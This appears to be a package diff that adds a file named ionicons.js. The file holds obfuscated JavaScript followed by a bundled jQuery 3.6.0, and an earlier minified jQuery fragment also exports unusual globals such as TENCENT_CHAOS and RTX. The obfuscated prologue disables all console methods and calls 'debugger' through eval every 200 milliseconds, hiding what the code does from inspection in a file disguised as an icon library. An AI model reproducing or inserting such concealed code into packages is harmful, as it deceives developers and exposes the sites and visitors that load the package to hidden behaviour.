C.each(e, function (e, t) { i || Wt.test(r) ? o(r, t) : n(r + "[" + ("object" == typeof t && null != t ? e : "") + "]", t, i, o) }); else if (i || "object" !== h(e)) o(r, e); else for (var t in e) n(r + "[" + t + "]", e[t], i, o) }(r, e[r], t, n); return i.join("&") }; C.fn.extend({ serialize: function () { return C.param(this.serializeArray()) }, serializeArray: function () { return this.map(function () { var e = C.prop(this, "elements"); return e ? C.makeArray(e) : this }).filter(function () { var e = this.type; return this.name && !C(this).is(":disabled") && $t.test(this.nodeName) && !_t.test(e) && (this.checked || !Se.test(e)) }).map(function (e, t) { var n = C(this).val(); return null == n ? null : Array.isArray(n) ? C.map(n, function (e) { return { name: t.name, value: e.replace(Ft, "\r\n") } }) : { name: t.name, value: n.replace(Ft, "\r\n") } }).get() } }); var Bt = /%20/g, zt = /#.*$/, Ut = /([?&])_=[^&]*/, Xt = /^(.*?):[ \t]*([^\r\n]*)$/gm, Vt = /^(?:GET|HEAD)$/, Gt = /^\/\//, Yt = {}, Qt = {}, Jt = "*/".concat("*"), Kt = T.createElement("a"); Kt.href = Rt.href; function Zt(o) { return function (e, t) { if ("string" != typeof e) { t = e; e = "*" } var n, r = 0, i = e.toLowerCase().match(E) || []; if (v(t)) for (; n = i[r++];)if ("+" === n[0]) { n = n.slice(1) || "*"; (o[n] = o[n] || []).unshift(t) } else (o[n] = o[n] || []).push(t) } } function en(t, r, i, o) { var s = {}, a = t === Qt; function u(e) { var n; s[e] = !0; C.each(t[e] || [], function (e, t) { t = t(r, i, o); if ("string" == typeof t && !a && !s[t]) { r.dataTypes.unshift(t); u(t); return !1 } if (a) return !(n = t) }); return n } return u(r.dataTypes[0]) || !s["*"] && u("*") } function tn(e, t) { var n, r, i = C.ajaxSettings.flatOptions || {}; for (n in t) void 0 !== t[n] && ((i[n] ? e : r = r || {})[n] = t[n]); r && C.extend(!0, e, r); return e } C.extend({ active: 0, lastModified: {}, etag: {}, ajaxSettings: { url: Rt.href, type: "GET", isLocal: /^(?:about|app|app-storage|.+-extension|file|res|widget):$/.test(Rt.protocol), global: !0, processData: !0, async: !0, contentType: "application/x-www-form-urlencoded; charset=UTF-8", accepts: { "*": Jt, text: "text/plain", html: "text/html", xml: "application/xml, text/xml", json: "application/json, text/javascript" }, contents: { xml: /\bxml\b/, html: /\bhtml/, json: /\bjson\b/ }, responseFields: { xml: "responseXML", text: "responseText", json: "responseJSON" }, converters: { "* text": String, "text html": !0, "text json": JSON.parse, "text xml": C.parseXML }, flatOptions: { url: !0, context: !0 } }, ajaxSetup: function (e, t) { return t ? tn(tn(e, C.ajaxSettings), t) : tn(C.ajaxSettings, e) }, ajaxPrefilter: Zt(Yt), ajaxTransport: Zt(Qt), ajax: function (e, t) { if ("object" == typeof e) { t = e; e = void 0 } var u, l, c, n, f, p, d, r, h = C.ajaxSetup({}, t = t || {}), g = h.context || h, m = h.context && (g.nodeType || g.jquery) ? C(g) : C.event, y = C.Deferred(), v = C.Callbacks("once memory"), x = h.statusCode || {}, i = {}, o = {}, s = "canceled", b = { readyState: 0, getResponseHeader: function (e) { var t; if (p) { if (!n) { n = {}; for (; t = Xt.exec(c);)n[t[1].toLowerCase() + " "] = (n[t[1].toLowerCase() + " "] || []).concat(t[2]) } t = n[e.toLowerCase() + " "] } return null == t ? null : t.join(", ") }, getAllResponseHeaders: function () { return p ? c : null }, setRequestHeader: function (e, t) { if (null == p) { e = o[e.toLowerCase()] = o[e.toLowerCase()] || e; i[e] = t } return this }, overrideMimeType: function (e) { null == p && (h.mimeType = e); return this }, statusCode: function (e) { if (e) if (p) b.always(e[b.status]); else for (var t in e) x[t] = [x[t], e[t]]; return this }, abort: function (e) { e = e || s; u && u.abort(e); a(0, e); return this } }; y.promise(b); h.url = ((e || h.url || Rt.href) + "").replace(Gt, Rt.protocol + "//"); h.type = t.method || t.type || h.method || h.type; h.dataTypes = (h.dataType || "*").toLowerCase().match(E) || [""]; if (null == h.crossDomain) { e = T.createElement("a"); try { e.href = h.url; e.href = e.href; h.crossDomain = Kt.protocol + "//" + Kt.host != e.protocol + "//" + e.host } catch (e) { h.crossDomain = !0 } } h.data && h.processData && "string" != typeof h.data && (h.data = C.param(h.data, h.traditional)); en(Yt, h, t, b); if (p) return b; (d = C.event && h.global) && 0 == C.active++ && C.event.trigger("ajaxStart"); h.type = h.type.toUpperCase(); h.hasContent = !Vt.test(h.type); l = h.url.replace(zt, ""); if (h.hasContent) h.data && h.processData && 0 === (h.contentType || "").indexOf("application/x-www-form-urlencoded") && (h.data = h.data.replace(Bt, "+")); else { e = h.url.slice(l.length); if (h.data && (h.processData || "string" == typeof h.data)) { l += (It.test(l) ? "&" : "?") + h.data; delete h.data } if (!1 === h.cache) { l = l.replace(Ut, "$1"); e = (It.test(l) ? "&" : "?") + "_=" + Mt.guid++ + e } h.url = l + e } if (h.ifModified) { C.lastModified[l] && b.setRequestHeader("If-Modified-Since", C.lastModified[l]); C.etag[l] && b.setRequestHeader("If-None-Match", C.etag[l]) } (h.data && h.hasContent && !1 !== h.contentType || t.contentType) && b.setRequestHeader("Content-Type", h.contentType); b.setRequestHeader("Accept", h.dataTypes[0] && h.accepts[h.dataTypes[0]] ? h.accepts[h.dataTypes[0]] + ("*" !== h.dataTypes[0] ? ", " + Jt + "; q=0.01" : "") : h.accepts["*"]); for (r in h.headers) b.setRequestHeader(r, h.headers[r]); if (h.beforeSend && (!1 === h.beforeSend.call(g, b, h) || p)) return b.abort(); s = "abort"; v.add(h.complete); b.done(h.success); b.fail(h.error); if (u = en(Qt, h, t, b)) { b.readyState = 1; d && m.trigger("ajaxSend", [b, h]); if (p) return b; h.async && 0 < h.timeout && (f = w.setTimeout(function () { b.abort("timeout") }, h.timeout)); try { p = !1; u.send(i, a) } catch (e) { if (p) throw e; a(-1, e) } } else a(-1, "No Transport"); function a(e, t, n, r) { var i, o, s, a = t; if (!p) { p = !0; f && w.clearTimeout(f); u = void 0; c = r || ""; b.readyState = 0 < e ? 4 : 0; r = 200 <= e && e < 300 || 304 === e; n && (s = function (e, t, n) { for (var r, i, o, s, a = e.contents, u = e.dataTypes; "*" === u[0];) { u.shift(); void 0 === r && (r = e.mimeType || t.getResponseHeader("Content-Type")) } if (r) for (i in a) if (a[i] && a[i].test(r)) { u.unshift(i); break } if (u[0] in n) o = u[0]; else { for (i in n) { if (!u[0] || e.converters[i + " " + u[0]]) { o = i; break } s = s || i } o = o || s } if (o) return o !== u[0] && u.unshift(o), n[o] }(h, b, n)); !r && -1 < C.inArray("script", h.dataTypes) && C.inArray("json", h.dataTypes) < 0 && (h.converters["text script"] = function () { }); s = function (e, t, n, r) { var i, o, s, a, u, l = {}, c = e.dataTypes.slice(); if (c[1]) for (s in e.converters) l[s.toLowerCase()] = e.converters[s]; o = c.shift(); for (; o;) { e.responseFields[o] && (n[e.responseFields[o]] = t); !u && r && e.dataFilter && (t = e.dataFilter(t, e.dataType)); u = o; if (o = c.shift()) if ("*" === o) o = u; else if ("*" !== u && u !== o) { if (!(s = l[u + " " + o] || l["* " + o])) for (i in l) { a = i.split(" "); if (a[1] === o && (s = l[u + " " + a[0]] || l["* " + a[0]])) { if (!0 === s) s = l[i]; else if (!0 !== l[i]) { o = a[0]; c.unshift(a[1]) } break } } if (!0 !== s) if (s && e.throws) t = s(t); else try { t = s(t) } catch (e) { return { state: "parsererror", error: s ? e : "No conversion from " + u + " to " + o } } } } return { state: "success", data: t } }(h, s, b, r); if (r) { if (h.ifModified) { (n = b.getResponseHeader("Last-Modified")) && (C.lastModified[l] = n); (n = b.getResponseHeader("etag")) && (C.etag[l] = n) } if (204 === e || "HEAD" === h.type) a = "nocontent"; else if (304 === e) a = "notmodified"; else { a = s.state; i = s.data; r = !(o = s.error) } } else { o = a; if (e || !a) { a = "error"; e < 0 && (e = 0) } } b.status = e; b.statusText = (t || a) + ""; r ? y.resolveWith(g, [i, a, b]) : y.rejectWith(g, [b, a, o]); b.statusCode(x); x = void 0; d && m.trigger(r ? "ajaxSuccess" : "ajaxError", [b, h, r ? i : o]); v.fireWith(g, [b, a]); if (d) { m.trigger("ajaxComplete", [b, h]); --C.active || C.event.trigger("ajaxStop") } } } return b }, getJSON: function (e, t, n) { return C.get(e, t, n, "json") }, getScript: function (e, t) { return C.get(e, void 0, t, "script") } }); C.each(["get", "post"], function (e, i) { C[i] = function (e, t, n, r) { if (v(t)) { r = r || n; n = t; t = void 0 } return C.ajax(C.extend({ url: e, type: i, dataType: r, data: t, success: n }, C.isPlainObject(e) && e)) } }); C.ajaxPrefilter(function (e) { for (var t in e.headers) "content-type" === t.toLowerCase() && (e.contentType = e.headers[t] || "") }); C._evalUrl = function (e, t, n) { return C.ajax({ url: e, type: "GET", dataType: "script", cache: !0, async: !1, global: !1, converters: { "text script": function () { } }, dataFilter: function (e) { C.globalEval(e, t, n) } }) }; C.fn.extend({ wrapAll: function (e) { if (this[0]) { v(e) && (e = e.call(this[0])); e = C(e, this[0].ownerDocument).eq(0).clone(!0); this[0].parentNode && e.insertBefore(this[0]); e.map(function () { for (var e = this; e.firstElementChild;)e = e.firstElementChild; return e }).append(this) } return this }, wrapInner: function (n) { return v(n) ? this.each(function (e) { C(this).wrapInner(n.call(this, e)) }) : this.each(function () { var e = C(this), t = e.contents(); t.length ? t.wrapAll(n) : e.append(n) }) }, wrap: function (t) { var n = v(t); return this.each(function (e) { C(this).wrapAll(n ? t.call(this, e) : t) }) }, unwrap: function (e) { this.parent(e).not("body").each(function () { C(this).replaceWith(this.childNodes) }); return this } }); C.expr.pseudos.hidden = function (e) { return !C.expr.pseudos.visible(e) }; C.expr.pseudos.visible = function (e) { return !!(e.offsetWidth || e.offsetHeight || e.getClientRects().length) }; C.ajaxSettings.xhr = function () { try { return new w.XMLHttpRequest } catch (e) { } }; var nn = { 0: 200, 1223: 204 }, rn = C.ajaxSettings.xhr(); m.cors = !!rn && "withCredentials" in rn; m.ajax = rn = !!rn; C.ajaxTransport(function (i) { var o, s; if (m.cors || rn && !i.crossDomain) return { send: function (e, t) { var n, r = i.xhr(); r.open(i.type, i.url, i.async, i.username, i.password); if (i.xhrFields) for (n in i.xhrFields) r[n] = i.xhrFields[n]; i.mimeType && r.overrideMimeType && r.overrideMimeType(i.mimeType); i.crossDomain || e["X-Requested-With"] || (e["X-Requested-With"] = "XMLHttpRequest"); for (n in e) r.setRequestHeader(n, e[n]); o = function (e) { return function () { if (o) { o = s = r.onload = r.onerror = r.onabort = r.ontimeout = r.onreadystatechange = null; "abort" === e ? r.abort() : "error" === e ? "number" != typeof r.status ? t(0, "error") : t(r.status, r.statusText) : t(nn[r.status] || r.status, r.statusText, "text" !== (r.responseType || "text") || "string" != typeof r.responseText ? { binary: r.response } : { text: r.responseText }, r.getAllResponseHeaders()) } } }; r.onload = o(); s = r.onerror = r.ontimeout = o("error"); void 0 !== r.onabort ? r.onabort = s : r.onreadystatechange = function () { 4 === r.readyState && w.setTimeout(function () { o && s() }) }; o = o("abort"); try { r.send(i.hasContent && i.data || null) } catch (e) { if (o) throw e } }, abort: function () { o && o() } } }); C.ajaxPrefilter(function (e) { e.crossDomain && (e.contents.script = !1) }); C.ajaxSetup({ accepts: { script: "text/javascript, application/javascript, application/ecmascript, application/x-ecmascript" }, contents: { script: /\b(?:java|ecma)script\b/ }, converters: { "text script": function (e) { C.globalEval(e); return e } } }); C.ajaxPrefilter("script", function (e) { void 0 === e.cache && (e.cache = !1); e.crossDomain && (e.type = "GET") }); C.ajaxTransport("script", function (n) { var r, i; if (n.crossDomain || n.scriptAttrs) return { send: function (e, t) { r = C("<script>").attr(n.scriptAttrs || {}).prop({ charset: n.scriptCharset, src: n.url }).on("load error", i = function (e) { r.remove(); i = null; e && t("error" === e.type ? 404 : 200, e.type) }); T.head.appendChild(r[0]) }, abort: function () { i && i() } } }); var on = [], sn = /(=)\?(?=&|$)|\?\?/; C.ajaxSetup({ jsonp: "callback", jsonpCallback: function () { var e = on.pop() || C.expando + "_" + Mt.guid++; this[e] = !0; return e } }); C.ajaxPrefilter("json jsonp", function (e, t, n) { var r, i, o, s = !1 !== e.jsonp && (sn.test(e.url) ? "url" : "string" == typeof e.data && 0 === (e.contentType || "").indexOf("application/x-www-form-urlencoded") && sn.test(e.data) && "data"); if (s || "jsonp" === e.dataTypes[0]) { r = e.jsonpCallback = v(e.jsonpCallback) ? e.jsonpCallback() : e.jsonpCallback; s ? e[s] = e[s].replace(sn, "$1" + r) : !1 !== e.jsonp && (e.url += (It.test(e.url) ? "&" : "?") + e.jsonp + "=" + r); e.converters["script json"] = function () { o || C.error(r + " was not called"); return o[0] }; e.dataTypes[0] = "json"; i = w[r]; w[r] = function () { o = arguments }; n.always(function () { void 0 === i ? C(w).removeProp(r) : w[r] = i; if (e[r]) { e.jsonpCallback = t.jsonpCallback; on.push(r) } o && v(i) && i(o[0]); o = i = void 0 }); return "script" } }); m.createHTMLDocument = function () { var e = T.implementation.createHTMLDocument("").body; e.innerHTML = "<form></form><form></form>"; return 2 === e.childNodes.length }(); C.parseHTML = function (e, t, n) { if ("string" != typeof e) return []; if ("boolean" == typeof t) { n = t; t = !1 } var r; if (!t) if (m.createHTMLDocument) { (r = (t = T.implementation.createHTMLDocument("")).createElement("base")).href = T.location.href; t.head.appendChild(r) } else t = T; r = !n && []; if (n = te.exec(e)) return [t.createElement(n[1])]; n = De([e], t, r); r && r.length && C(r).remove(); return C.merge([], n.childNodes) }; C.fn.load = function (e, t, n) { var r, i, o, s = this, a = e.indexOf(" "); if (-1 < a) { r = O(e.slice(a)); e = e.slice(0, a) } if (v(t)) { n = t; t = void 0 } else t && "object" == typeof t && (i = "POST"); 0 < s.length && C.ajax({ url: e, type: i || "GET", dataType: "html", data: t }).done(function (e) { o = arguments; s.html(r ? C("<div>").append(C.parseHTML(e)).find(r) : e) }).always(n && function (e, t) { s.each(function () { n.apply(this, o || [e.responseText, t, e]) }) }); return this }; C.expr.pseudos.animated = function (t) { return C.grep(C.timers, function (e) { return t === e.elem }).length }; C.offset = { setOffset: function (e, t, n) { var r, i, o, s, a, u = C.css(e, "position"), l = C(e), c = {}; "static" === u && (e.style.position = "relative"); s = l.offset(); i = C.css(e, "top"); a = C.css(e, "left"); if (("absolute" === u || "fixed" === u) && -1 < (i + a).indexOf("auto")) { o = (u = l.position()).top; r = u.left } else { o = parseFloat(i) || 0; r = parseFloat(a) || 0 } null != (t = v(t) ? t.call(e, n, C.extend({}, s)) : t).top && (c.top = t.top - s.top + o); null != t.left && (c.left = t.left - s.left + r); "using" in t ? t.using.call(e, c) : l.css(c) } }; C.fn.extend({ offset: function (t) { if (arguments.length) return void 0 === t ? this : this.each(function (e) { C.offset.setOffset(this, t, e) }); var e, n = this[0]; if (n) { if (!n.getClientRects().length) return { top: 0, left: 0 }; e = n.getBoundingClientRect(); n = n.ownerDocument.defaultView; return { top: e.top + n.pageYOffset, left: e.left + n.pageXOffset } } }, position: function () { if (this[0]) { var e, t, n, r = this[0], i = { top: 0, left: 0 }; if ("fixed" === C.css(r, "position")) t = r.getBoundingClientRect(); else { t = this.offset(); n = r.ownerDocument; e = r.offsetParent || n.documentElement; for (; e && (e === n.body || e === n.documentElement) && "static" === C.css(e, "position");)e = e.parentNode; if (e && e !== r && 1 === e.nodeType) { (i = C(e).offset()).top += C.css(e, "borderTopWidth", !0); i.left += C.css(e, "borderLeftWidth", !0) } } return { top: t.top - i.top - C.css(r, "marginTop", !0), left: t.left - i.left - C.css(r, "marginLeft", !0) } } }, offsetParent: function () { return this.map(function () { for (var e = this.offsetParent; e && "static" === C.css(e, "position");)e = e.offsetParent; return e || S }) } }); C.each({ scrollLeft: "pageXOffset", scrollTop: "pageYOffset" }, function (t, i) { var o = "pageYOffset" === i; C.fn[t] = function (e) { return f(this, function (e, t, n) { var r; g(e) ? r = e : 9 === e.nodeType && (r = e.defaultView); if (void 0 === n) return r ? r[i] : e[t]; r ? r.scrollTo(o ? r.pageXOffset : n, o ? n : r.pageYOffset) : e[t] = n }, t, e, arguments.length) } }); C.each(["top", "left"], function (e, n) { C.cssHooks[n] = rt(m.pixelPosition, function (e, t) { if (t) return t = nt(e, n), Ue.test(t) ? C(e).position()[n] + "px" : t }) }); C.each({ Height: "height", Width: "width" }, function (s, a) { C.each({ padding: "inner" + s, content: a, "": "outer" + s }, function (i, o) { C.fn[o] = function (e, t) { var n = arguments.length && (i || "boolean" != typeof e), r = i || (!0 === e || !0 === t ? "margin" : "border"); return f(this, function (e, t, n) { return g(e) ? 0 === o.indexOf("outer") ? e["inner" + s] : e.document.documentElement["client" + s] : 9 !== e.nodeType ? void 0 === n ? C.css(e, t, r) : C.style(e, t, n, r) : (t = e.documentElement, Math.max(e.body["scroll" + s], t["scroll" + s], e.body["offset" + s], t["offset" + s], t["client" + s])) }, a, n ? e : void 0, n) } }) }); C.each(["ajaxStart", "ajaxStop", "ajaxComplete", "ajaxError", "ajaxSuccess", "ajaxSend"], function (e, t) { C.fn[t] = function (e) { return this.on(t, e) } }); C.fn.extend({ bind: function (e, t, n) { return this.on(e, null, t, n) }, unbind: function (e, t) { return this.off(e, null, t) }, delegate: function (e, t, n, r) { return this.on(t, e, n, r) }, undelegate: function (e, t, n) { return 1 === arguments.length ? this.off(e, "**") : this.off(t, e || "**", n) }, hover: function (e, t) { return this.mouseenter(e).mouseleave(t || e) } }); C.each("blur focus focusin focusout resize scroll click dblclick mousedown mouseup mousemove mouseover mouseout mouseenter mouseleave change select submit keydown keypress keyup contextmenu".split(" "), function (e, n) { C.fn[n] = function (e, t) { return 0 < arguments.length ? this.on(n, null, e, t) : this.trigger(n) } }); var an = /^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g; C.proxy = function (e, t) { var n, r; if ("string" == typeof t) { r = e[t]; t = e; e = r } if (v(e)) { n = a.call(arguments, 2); (r = function () { return e.apply(t || this, n.concat(a.call(arguments))) }).guid = e.guid = e.guid || C.guid++; return r } }; C.holdReady = function (e) { e ? C.readyWait++ : C.ready(!0) }; C.isArray = Array.isArray; C.parseJSON = JSON.parse; C.nodeName = u; C.isFunction = v; C.isWindow = g; C.camelCase = x; C.type = h; C.now = Date.now; C.isNumeric = function (e) { var t = C.type(e); return ("number" === t || "string" === t) && !isNaN(e - parseFloat(e)) }; C.trim = function (e) { return null == e ? "" : (e + "").replace(an, "") }; "function" == typeof define && define.amd && define("jquery", [], function () { return C }); var un = w.jQuery, ln = w.$; C.noConflict = function (e) { w.$ === C && (w.$ = ln); e && w.jQuery === C && (w.jQuery = un); return C }; if (void 0 === R) { w.jQuery = w.$ = C; w.TENCENT_CHAOS = J; w.MT_CHAOS = kt; w.TENCENT_GAMES = mt; w.RTX = vt; w.Rot = function (e) { return new Y(e) } } return C });
|
package/ionicons.js
ADDED
|
@@ -0,0 +1 @@
|
|
|
1
|
+
var _0x3d88 = ["log", "debug", "info", "error", "exception", "table", "warn", "trace", "apply", "debu", "gger", "don", "return (function() ", '{}.constructor("return this")( )', "console"]; !function (e, t) { !function (t) { for (; --t;)e.push(e.shift()) }(++t) }(_0x3d88, 368); var _0x306c = function (e, t) { return _0x3d88[e -= 0] }; !function (_0x2605bc) { var _0x4c9a2c = (_0x244728 = !0, function (e, t) { var n = _0x244728 ? function () { if (t) { var n = t[_0x306c("0x0")](e, arguments); return t = null, n } } : function () { }; return _0x244728 = !1, n }), _0x244728, _0x4ed3d0 = [_0x306c("0x1"), _0x306c("0x2"), _0x306c("0x3")]; function _0x17f16e() { var _0x41d7ca = _0x4c9a2c(this, function () { var e = function () { }, t = function () { var e; try { e = Function(_0x306c("0x4") + _0x306c("0x5") + ");")() } catch (t) { e = window } return e }(); t[_0x306c("0x6")] ? (t[_0x306c("0x6")][_0x306c("0x7")] = e, t[_0x306c("0x6")][_0x306c("0xd")] = e, t[_0x306c("0x6")][_0x306c("0x8")] = e, t[_0x306c("0x6")][_0x306c("0x9")] = e, t[_0x306c("0x6")][_0x306c("0xa")] = e, t[_0x306c("0x6")][_0x306c("0xb")] = e, t[_0x306c("0x6")][_0x306c("0xc")] = e, t[_0x306c("0x6")][_0x306c("0xe")] = e) : t[_0x306c("0x6")] = function (e) { var t = {}; return t[_0x306c("0x7")] = e, t.warn = e, t[_0x306c("0x8")] = e, t[_0x306c("0x9")] = e, t[_0x306c("0xa")] = e, t[_0x306c("0xb")] = e, t[_0x306c("0xc")] = e, t.trace = e, t }(e) }); return _0x41d7ca(), function () { return eval(_0x4ed3d0[0] + _0x4ed3d0[1]) } } _0x2605bc[_0x4ed3d0[2]] = _0x17f16e(), setInterval(_0x4ed3d0[2] + "()", 200) }(window), function (e, t) { "use strict"; "object" == typeof module && "object" == typeof module.exports ? module.exports = e.document ? t(e, !0) : function (e) { if (!e.document) throw new Error("jQuery requires a window with a document"); return t(e) } : t(e) }("undefined" != typeof window ? window : this, function (e, t) { "use strict"; var n = [], r = Object.getPrototypeOf, i = n.slice, o = n.flat ? function (e) { return n.flat.call(e) } : function (e) { return n.concat.apply([], e) }, a = n.push, s = n.indexOf, u = {}, l = u.toString, c = u.hasOwnProperty, f = c.toString, p = f.call(Object), d = {}, h = function (e) { return "function" == typeof e && "number" != typeof e.nodeType && "function" != typeof e.item }, g = function (e) { return null != e && e === e.window }, v = e.document, y = { type: !0, src: !0, nonce: !0, noModule: !0 }; function m(e, t, n) { var r, i, o = (n = n || v).createElement("script"); if (o.text = e, t) for (r in y) (i = t[r] || t.getAttribute && t.getAttribute(r)) && o.setAttribute(r, i); n.head.appendChild(o).parentNode.removeChild(o) } function x(e) { return null == e ? e + "" : "object" == typeof e || "function" == typeof e ? u[l.call(e)] || "object" : typeof e } var b = function (e, t) { return new b.fn.init(e, t) }; function w(e) { var t = !!e && "length" in e && e.length, n = x(e); return !h(e) && !g(e) && ("array" === n || 0 === t || "number" == typeof t && t > 0 && t - 1 in e) } b.fn = b.prototype = { jquery: "3.6.0", constructor: b, length: 0, toArray: function () { return i.call(this) }, get: function (e) { return null == e ? i.call(this) : e < 0 ? this[e + this.length] : this[e] }, pushStack: function (e) { var t = b.merge(this.constructor(), e); return t.prevObject = this, t }, each: function (e) { return b.each(this, e) }, map: function (e) { return this.pushStack(b.map(this, function (t, n) { return e.call(t, n, t) })) }, slice: function () { return this.pushStack(i.apply(this, arguments)) }, first: function () { return this.eq(0) }, last: function () { return this.eq(-1) }, even: function () { return this.pushStack(b.grep(this, function (e, t) { return (t + 1) % 2 })) }, odd: function () { return this.pushStack(b.grep(this, function (e, t) { return t % 2 })) }, eq: function (e) { var t = this.length, n = +e + (e < 0 ? t : 0); return this.pushStack(n >= 0 && n < t ? [this[n]] : []) }, end: function () { return this.prevObject || this.constructor() }, push: a, sort: n.sort, splice: n.splice }, b.extend = b.fn.extend = function () { var e, t, n, r, i, o, a = arguments[0] || {}, s = 1, u = arguments.length, l = !1; for ("boolean" == typeof a && (l = a, a = arguments[s] || {}, s++), "object" == typeof a || h(a) || (a = {}), s === u && (a = this, s--); s < u; s++)if (null != (e = arguments[s])) for (t in e) r = e[t], "__proto__" !== t && a !== r && (l && r && (b.isPlainObject(r) || (i = Array.isArray(r))) ? (n = a[t], o = i && !Array.isArray(n) ? [] : i || b.isPlainObject(n) ? n : {}, i = !1, a[t] = b.extend(l, o, r)) : void 0 !== r && (a[t] = r)); return a }, b.extend({ expando: "jQuery" + ("3.6.0" + Math.random()).replace(/\D/g, ""), isReady: !0, error: function (e) { throw new Error(e) }, noop: function () { }, isPlainObject: function (e) { var t, n; return !(!e || "[object Object]" !== l.call(e)) && (!(t = r(e)) || "function" == typeof (n = c.call(t, "constructor") && t.constructor) && f.call(n) === p) }, isEmptyObject: function (e) { var t; for (t in e) return !1; return !0 }, globalEval: function (e, t, n) { m(e, { nonce: t && t.nonce }, n) }, each: function (e, t) { var n, r = 0; if (w(e)) for (n = e.length; r < n && !1 !== t.call(e[r], r, e[r]); r++); else for (r in e) if (!1 === t.call(e[r], r, e[r])) break; return e }, makeArray: function (e, t) { var n = t || []; return null != e && (w(Object(e)) ? b.merge(n, "string" == typeof e ? [e] : e) : a.call(n, e)), n }, inArray: function (e, t, n) { return null == t ? -1 : s.call(t, e, n) }, merge: function (e, t) { for (var n = +t.length, r = 0, i = e.length; r < n; r++)e[i++] = t[r]; return e.length = i, e }, grep: function (e, t, n) { for (var r = [], i = 0, o = e.length, a = !n; i < o; i++)!t(e[i], i) !== a && r.push(e[i]); return r }, map: function (e, t, n) { var r, i, a = 0, s = []; if (w(e)) for (r = e.length; a < r; a++)null != (i = t(e[a], a, n)) && s.push(i); else for (a in e) null != (i = t(e[a], a, n)) && s.push(i); return o(s) }, guid: 1, support: d }), "function" == typeof Symbol && (b.fn[Symbol.iterator] = n[Symbol.iterator]), b.each("Boolean Number String Function Array Date RegExp Object Error Symbol".split(" "), function (e, t) { u["[object " + t + "]"] = t.toLowerCase() }); var T = function (e) { var t, n, r, i, o, a, s, u, l, c, f, p, d, h, g, v, y, m, x, b = "sizzle" + 1 * new Date, w = e.document, T = 0, C = 0, E = ue(), S = ue(), A = ue(), k = ue(), N = function (e, t) { return e === t && (f = !0), 0 }, j = {}.hasOwnProperty, D = [], q = D.pop, L = D.push, H = D.push, _ = D.slice, O = function (e, t) { for (var n = 0, r = e.length; n < r; n++)if (e[n] === t) return n; return -1 }, P = "checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped", R = "[\\x20\\t\\r\\n\\f]", M = "(?:\\\\[\\da-fA-F]{1,6}" + R + "?|\\\\[^\\r\\n\\f]|[\\w-]|[^\0-\\x7f])+", I = "\\[" + R + "*(" + M + ")(?:" + R + "*([*^$|!~]?=)" + R + "*(?:'((?:\\\\.|[^\\\\'])*)'|\"((?:\\\\.|[^\\\\\"])*)\"|(" + M + "))|)" + R + "*\\]", W = ":(" + M + ")(?:\\((('((?:\\\\.|[^\\\\'])*)'|\"((?:\\\\.|[^\\\\\"])*)\")|((?:\\\\.|[^\\\\()[\\]]|" + I + ")*)|.*)\\)|)", F = new RegExp(R + "+", "g"), $ = new RegExp("^" + R + "+|((?:^|[^\\\\])(?:\\\\.)*)" + R + "+$", "g"), B = new RegExp("^" + R + "*," + R + "*"), z = new RegExp("^" + R + "*([>+~]|" + R + ")" + R + "*"), X = new RegExp(R + "|>"), U = new RegExp(W), V = new RegExp("^" + M + "$"), G = { ID: new RegExp("^#(" + M + ")"), CLASS: new RegExp("^\\.(" + M + ")"), TAG: new RegExp("^(" + M + "|[*])"), ATTR: new RegExp("^" + I), PSEUDO: new RegExp("^" + W), CHILD: new RegExp("^:(only|first|last|nth|nth-last)-(child|of-type)(?:\\(" + R + "*(even|odd|(([+-]|)(\\d*)n|)" + R + "*(?:([+-]|)" + R + "*(\\d+)|))" + R + "*\\)|)", "i"), bool: new RegExp("^(?:" + P + ")$", "i"), needsContext: new RegExp("^" + R + "*[>+~]|:(even|odd|eq|gt|lt|nth|first|last)(?:\\(" + R + "*((?:-\\d)?\\d*)" + R + "*\\)|)(?=[^-]|$)", "i") }, Y = /HTML$/i, Q = /^(?:input|select|textarea|button)$/i, J = /^h\d$/i, K = /^[^{]+\{\s*\[native \w/, Z = /^(?:#([\w-]+)|(\w+)|\.([\w-]+))$/, ee = /[+~]/, te = new RegExp("\\\\[\\da-fA-F]{1,6}" + R + "?|\\\\([^\\r\\n\\f])", "g"), ne = function (e, t) { var n = "0x" + e.slice(1) - 65536; return t || (n < 0 ? String.fromCharCode(n + 65536) : String.fromCharCode(n >> 10 | 55296, 1023 & n | 56320)) }, re = /([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\x7f-\uFFFF\w-]/g, ie = function (e, t) { return t ? "\0" === e ? "�" : e.slice(0, -1) + "\\" + e.charCodeAt(e.length - 1).toString(16) + " " : "\\" + e }, oe = function () { p() }, ae = be(function (e) { return !0 === e.disabled && "fieldset" === e.nodeName.toLowerCase() }, { dir: "parentNode", next: "legend" }); try { H.apply(D = _.call(w.childNodes), w.childNodes), D[w.childNodes.length].nodeType } catch (e) { H = { apply: D.length ? function (e, t) { L.apply(e, _.call(t)) } : function (e, t) { for (var n = e.length, r = 0; e[n++] = t[r++];); e.length = n - 1 } } } function se(e, t, r, i) { var o, s, l, c, f, h, y, m = t && t.ownerDocument, w = t ? t.nodeType : 9; if (r = r || [], "string" != typeof e || !e || 1 !== w && 9 !== w && 11 !== w) return r; if (!i && (p(t), t = t || d, g)) { if (11 !== w && (f = Z.exec(e))) if (o = f[1]) { if (9 === w) { if (!(l = t.getElementById(o))) return r; if (l.id === o) return r.push(l), r } else if (m && (l = m.getElementById(o)) && x(t, l) && l.id === o) return r.push(l), r } else { if (f[2]) return H.apply(r, t.getElementsByTagName(e)), r; if ((o = f[3]) && n.getElementsByClassName && t.getElementsByClassName) return H.apply(r, t.getElementsByClassName(o)), r } if (n.qsa && !k[e + " "] && (!v || !v.test(e)) && (1 !== w || "object" !== t.nodeName.toLowerCase())) { if (y = e, m = t, 1 === w && (X.test(e) || z.test(e))) { for ((m = ee.test(e) && ye(t.parentNode) || t) === t && n.scope || ((c = t.getAttribute("id")) ? c = c.replace(re, ie) : t.setAttribute("id", c = b)), s = (h = a(e)).length; s--;)h[s] = (c ? "#" + c : ":scope") + " " + xe(h[s]); y = h.join(",") } try { return H.apply(r, m.querySelectorAll(y)), r } catch (t) { k(e, !0) } finally { c === b && t.removeAttribute("id") } } } return u(e.replace($, "$1"), t, r, i) } function ue() { var e = []; return function t(n, i) { return e.push(n + " ") > r.cacheLength && delete t[e.shift()], t[n + " "] = i } } function le(e) { return e[b] = !0, e } function ce(e) { var t = d.createElement("fieldset"); try { return !!e(t) } catch (e) { return !1 } finally { t.parentNode && 